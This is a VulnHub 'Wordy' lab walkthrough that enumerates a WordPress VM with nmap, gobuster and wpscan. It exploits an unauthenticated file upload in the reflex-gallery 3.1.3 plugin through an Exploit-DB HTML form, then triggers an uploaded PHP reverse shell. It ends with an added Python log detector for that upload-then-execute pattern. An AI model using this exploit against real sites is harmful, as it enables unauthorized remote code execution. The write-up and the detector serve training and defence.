https://www.hackingarticles.in/ha-wordy-vulnhub-walkthrough/
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: Host: 127.0.1.1
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.81.23 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 10918]
/info.php (Status: 200) [Size: 13]
/javascript (Status: 301) [Size: 319] [--> <http://192.168.81.23/javascript/>]
/server-status (Status: 403) [Size: 278]
/wordpress (Status: 301) [Size: 318] [--> <http://192.168.81.23/wordpress/>]
┌──(kali㉿kali)-[~]
└─$ wpscan --url <http://192.168.190.23/wordpress/>
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[+] URL: <http://192.168.190.23/wordpress/> [192.168.190.23]
[+] Started: Thu Jul 28 11:13:57 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://192.168.190.23/wordpress/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://192.168.190.23/wordpress/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://192.168.190.23/wordpress/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://192.168.190.23/wordpress/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Found By: Rss Generator (Passive Detection)
| - <http://192.168.190.23/wordpress/index.php/feed/>, <generator><https://wordpress.org/?v=5.2.3></generator>
| - <http://192.168.190.23/wordpress/index.php/comments/feed/>, <generator><https://wordpress.org/?v=5.2.3></generator>
[+] WordPress theme in use: twentysixteen
| Location: <http://192.168.190.23/wordpress/wp-content/themes/twentysixteen/>
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: <http://192.168.190.23/wordpress/wp-content/themes/twentysixteen/readme.txt>
| [!] The version is out of date, the latest version is 2.7
| Style URL: <http://192.168.190.23/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3>
| Style Name: Twenty Sixteen
| Style URI: <https://wordpress.org/themes/twentysixteen/>
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.0 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://192.168.190.23/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3>, Match: 'Version: 2.0'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/mail-masta/>
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/mail-masta/readme.txt>
[+] reflex-gallery
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/reflex-gallery/>
| Last Updated: 2021-03-10T02:38:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/reflex-gallery/readme.txt>
[+] site-editor
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/site-editor/>
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/site-editor/readme.txt>
[+] slideshow-gallery
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/slideshow-gallery/>
| Last Updated: 2021-12-21T06:31:00.000Z
| [!] The version is out of date, the latest version is 1.7.4.4
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.4.6 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/slideshow-gallery/readme.txt>
[+] wp-easycart-data
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/wp-easycart-data/>
|
| Found By: Urls In Homepage (Passive Detection)
|
| The version could not be determined.
[+] wp-support-plus-responsive-ticket-system
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/>
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt>
[+] wp-symposium
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/wp-symposium/>
| Last Updated: 2015-08-21T12:36:00.000Z
| [!] The version is out of date, the latest version is 15.8.1
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 15.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/wp-symposium/readme.txt>
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - <http://192.168.81.23/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1>
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] aarti
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
As we can see, there are many plugins; here I will list them out one by one:
mail-masta 1.0
reflex-gallery 3.1.3
site-editor 1.1.1
slideshow-gallery 1.4.6
wp-easycart-data
wp-support-plus-responsive-ticket-system 7.1.3
wp-symposium 15.1
We will be targeting reflex-gallery 3.1.3.
From Exploit-DB (Offensive Security's Exploit Database Archive), we extract our own payload:
┌──(kali㉿kali)-[~]
└─$ cat fileupload.html
<form method="POST" action="http://192.168.190.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2022&Month=07" enctype="multipart/form-data">
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
Simply choose our PHP reverse shell and submit the form.
Once the upload succeeds, we trigger the reverse shell by visiting:
<http://192.168.190.23/wordpress/wp-content/uploads/2022/07/php-reverse-shell.php>
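As an added defender-side example (not part of the original walkthrough), the following Python picks the upload-then-execute sequence shown above out of Apache access logs: a POST to a plugin's file-uploader script followed by a 200 response for a .php file under wp-content/uploads from the same client. The log lines, client IPs, timestamps and the five-minute correlation window are constructed assumptions.

```python
import re
from datetime import datetime

# Constructed Apache combined-log sample modelling the walkthrough's sequence:
# a POST to reflex-gallery's FileUploader script, then a GET that executes the
# uploaded .php from wp-content/uploads. IPs and timestamps are invented.
SAMPLE_LOG = """\
192.168.190.50 - - [28/Jul/2022:11:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 10918 "-" "Mozilla/5.0"
192.168.190.50 - - [28/Jul/2022:11:20:07 +0000] "POST /wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2022&Month=07 HTTP/1.1" 200 47 "-" "Mozilla/5.0"
192.168.190.50 - - [28/Jul/2022:11:20:15 +0000] "GET /wordpress/wp-content/uploads/2022/07/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.190.77 - - [28/Jul/2022:11:21:00 +0000] "GET /wordpress/wp-content/uploads/2022/07/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# POSTs to an upload handler shipped inside a plugin directory.
UPLOADER_RE = re.compile(r'/wp-content/plugins/[^/]+/.*upload', re.IGNORECASE)
# Server-side scripts under uploads; that directory should serve static files only
# (mitigation: deny .php there, e.g. Apache <FilesMatch "\.php$">Require all denied</FilesMatch>).
UPLOADS_SCRIPT_RE = re.compile(r'/wp-content/uploads/.*\.ph(?:p\d?|tml|ar)$', re.IGNORECASE)


def parse(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["path"] = e["path"].split("?", 1)[0]  # drop the query string
    return e


def detect(log_text, window_seconds=300):
    """'php_served_from_uploads' fires on any 200 for a script under uploads;
    'upload_then_execute' adds the preceding plugin-uploader POST from the same IP."""
    alerts, pending = [], {}  # pending: ip -> [(ts, uploader_path), ...]
    for line in log_text.splitlines():
        e = parse(line)
        if e is None:
            continue
        if e["method"] == "POST" and UPLOADER_RE.search(e["path"]):
            pending.setdefault(e["ip"], []).append((e["ts"], e["path"]))
        elif e["status"] == "200" and UPLOADS_SCRIPT_RE.search(e["path"]):
            alerts.append(("php_served_from_uploads", e["ip"], e["path"]))
            for ts, uploader in pending.get(e["ip"], []):
                if 0 <= (e["ts"] - ts).total_seconds() <= window_seconds:
                    alerts.append(("upload_then_execute", e["ip"], uploader, e["path"]))
    return alerts
```

Run `detect(SAMPLE_LOG)` to see both alert kinds fire for the constructed client; the first alert alone is already actionable, since a 200 for a .php file under uploads should never happen on a correctly hardened site.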